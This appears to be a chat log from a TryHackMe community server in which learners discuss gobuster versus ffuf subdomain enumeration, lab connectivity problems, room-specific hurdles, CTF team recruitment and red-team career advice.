10.81.133.176   futurevera.thm portal.futurevera.thm payroll.futurevera.thm blog.futurevera.thm support.futurevera.thm secrethelpdesk934752.support.futurevera.thm

Indeed, if I add all those subdomains instead of only the main domain it fails for me too.

Gobuster and ffuf seem to handle name resolution differently, but I haven't wrapped my head around the exact difference yet. It seems gobuster does a single name resolution of only the main domain while ffuf seems to try to resoved fuzzed domains.

here if I delete all the subdomains it still fails on the first one

and then the second fails also

go buster still works

so lessons to take , use gobuster

@pallid pine thanks for all the help

Gave +1 Rep to @pallid pine (current: #1352 - 4)

also with my own wordlist gobuster still works and give the expected output

Yes, I like gobuster more. Also the error reporting is better. If the host is down, fuff will just sit there trying in vain wihtout showing a clear error while gobuster will clearly report a timeout

Anyway, gtg. Have fun 👋

Thanks

here time to sleep

Hi I’m trying the Hammer challenger and I have problem brute force the pin for the reset password, fuzz takes takes to long and it times out. I’m using a file with 9999 number, should I use a smaller batch of number or is there any ideas to solve first task?🤔

having an issue with an answer for a question

Task 07: Creating a Threat Intel Driven Campaign

how start bug bounty

guys , im on CTF school championship and i need someone to lead me up to a web exploitation cuz i don't know anything about it and i saw it like its very hard to exploit or injecting it . btw im working in picoCTF , is that website worth it only for my school ?

If this is a school competition, I'm afraid folks won't be able to assist as it might be considered as cheating.

Hi

Hii

Hi there! I am currently learning about AD Penetration testing more specifically about Kerberoastable accounts, SNPs, PowerView and so on. I wanted to ask if there are any good rooms here for CTFs, where I can practice those specific skills? Could anyone recommend any? Thanks in advance!

Hi guys, this is my first time solving a problem on try hack me and I'm already stuck on a basic pentesting task.As I understand it, first you need to scan the ports, I did everything as from the video. 1 what did the person in the video do, he pinged the iPad, it seemed like a delay, but 100 percent packet loss is writing to me. I decide to scan the ports via nmap -Pn -sT and nmap -Pn -sU, but it says that all ports are filtered. Maybe I don't understand something, maybe it's some kind of technical problem, but I really ask for someone's help.🙏

https://tryhackme.com/room/basicpentestingjt

You should be able to ping the target IP address. Have you tried traceroute to the target IP?

and how to do it?

traceroute target_ip

Log in to our private messages

?

I sent you a private message with the result.

Hey, I'm having issues connecting to the THM VPN. The troubleshooting script (thm-troubleshoot) stops with an error about MTU.

What I see when I run it:

text
[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
MTU value failed at 1000, aborting MTU check
Something went wrong -- please ask for further assistance...
I'm on Kali Linux. My internet is fine, the VPN connects (I get a tun0 interface with an IP like 10.10.x.x), but something with the MTU check fails. Can you help?

Also having the same issue

no one is there i assume

It's alr

Yo

Yo

Wassup

hel..l...o

I am new to discord so please help me out

Hello everyone well this is just something I want to to do actually soo basically I want to have a group of both newbies and experienced people in th world of cybersecurity mainly red teaming and penetration testing so we can all learn together and build ourselves. I know some might have some contradictory opinions but it's just what I think works. Soo anyone interested?.

@xul Hii which room are you on ?

i mainly want to do red teaming and penteration testing but before i want to work as a SOC Analyst to gain experience

Is it just me or none of the network rooms for AD on THM work?

try restarting

if the issue is still there then try again after sometime

Heyy guys today i got the Advent of Cyber rewards and i have got 75$ voucher but i am not able to utilize it cause i already have the premium so if anyone wants it .
Dm me .

Interested in learning this career path. I am definitely at the beginner stage but I am focused and willing to learn!

@marble pecan can i join?

Whar are the best rooms to start learning the red team?

have you completed basic?

if yes then go to skill matrices and click on red teaming you'll see the room that are required to do red teaming

Can anyone help me to perform some action on a website , I have the vulnerability but don't know how to exploit

Is this a live / production environment or a lab one?

hello i am newbie and looking forward to join the CTF or Bug bounty team as a beginner to learn from senior and to make friend in same profession , anyone please DM me if you are in any team willing to take me in 🙂

me too

s

First Learn To ask not demand

Youre newbie
On The top
Take anaalogy
Well rivers and anything dont come to

thirsty thirsty have to go there I hope you got it

😁

Hello good people, how y’all doing, am lost in this field , please i need help 😔💔

me too

I’m looking for someone skilled in reverse engineering I’m paying good money

Hi! I’m looking for three people to join a small CTF team. I’d prefer if you’re 15 or younger and live in a time zone that’s at most ±2 hours from Finland (UTC+0, UTC+1, UTC+2 or UTC+3). The goal isn’t to jump into competitions right away — first we’d get to know each other, practice together, and build a good team dynamic. I’m a beginner and want to improve step by step toward intermediate‑level CTFs. If you’re interested in learning and practicing together, feel free to message me!

Well If You Post Like This You Ai'nt Gonna Find

If Youre Willing And Able To Work Consistent Then Join My Team You will Be In Probation for SomeTime

Hey guys

What’s the average salary for first year (w intern experienced) pentester?

Google it

It varies based on location. Not certain if intern experience is considered though.

Extremely new to red teaming currently learning Linux and bash, next I will do power shell and python then c/c++ I want to do this for college and job if anyone is willing or wanting to work with me on random stuff or learn together just dm me please speak good English

Hello! Hoping to find some help with the Room "Custom Tooling using Burp" under Web Application Red Teaming. I am struggling with getting the "SECOND_VM_IP". I started the target VM, then the AttackBox. They say "You can find and start the second VM from this room(which is a link). We will use the IP address of the second VM as SECOND_VM_IP in this room." When I go to that room it tells me the VM is not in my region. Anyone else run into this? Thanks!

@Xul I am interested in red teaming as well; however, I am also new to Discord and do not know how to form groups.

Is anyone else on here interested in full-spectrum red teaming?

guys i am confused when im trying to gain root access after finding the setImpersonator is enabled

what is the free path to learn red teaming of web??

Also having this problem

Struggling with the windowsprivesc20 room, task 4.

For some reason i cant get a connect back, tried making the thing just echo some text as well and it seems to do nothing, its the right path according to schtask so im not sure what i could be doing wrong 🙈 anyone know?

I am interested

Hi everyone, I need some advice.
I've been in IT for 2 years, my background is mostly in infrastructure, servers (Windows & Linux), services, and now I'm working more as support in a SaaS company, but it's not a very technical role.
I realized I don't like very repetitive things like handling tickets, so I put my profile and the cybersecurity areas that best fit me into Claude's system, and they were all geared towards red team.
I feel like I don't have a strong foundation yet (OS, NETWORK, and WEB), but I have experience.
I want advice on migrating and studying for the red team area, especially with this AI "hype".

You’re actually in a solid spot already with the infra + server background—that’s more relevant to red teaming than you probably think.

The main gap you called out (OS, networking, web foundations) is real though, and that’s what will slow you down if you skip it.

I’d follow the THM roadmap, but specifically:

→ Pre Security → Cyber Security 101 (to clean up fundamentals)
→ Then go straight down the Pentester path (Jr Pentester → Web → Red Teaming)

Don’t treat it like “just courses” though—focus on:

really understanding networking (this is huge for red team)
getting comfortable with Linux + Windows internals
then Active Directory once you hit the red team path

Since you already have infra experience, that’ll click faster for you—especially AD attacks and lateral movement.

Also mix in hands-on stuff early (THM labs / HTB), otherwise it’ll feel like theory grind.

If you stay consistent on that path, you’ll have a much clearer transition into red team vs bouncing around randomly.

If you look at this roadmap (attached image), the path highlighted in green is basically what I’d recommend—foundations first, then straight down the pentester track into red teaming.

Thank you, that helps a lot.
Yes, I have that background, but now I want to focus on really having that solid foundation to specialize in.
I WILL take the Pre-Security course.

DM me if you have any questions about the course. I finished it, so I probably will be able to help.

@true oyster Security analysts pay a significant role in an organization....? What is the answer to that question ❓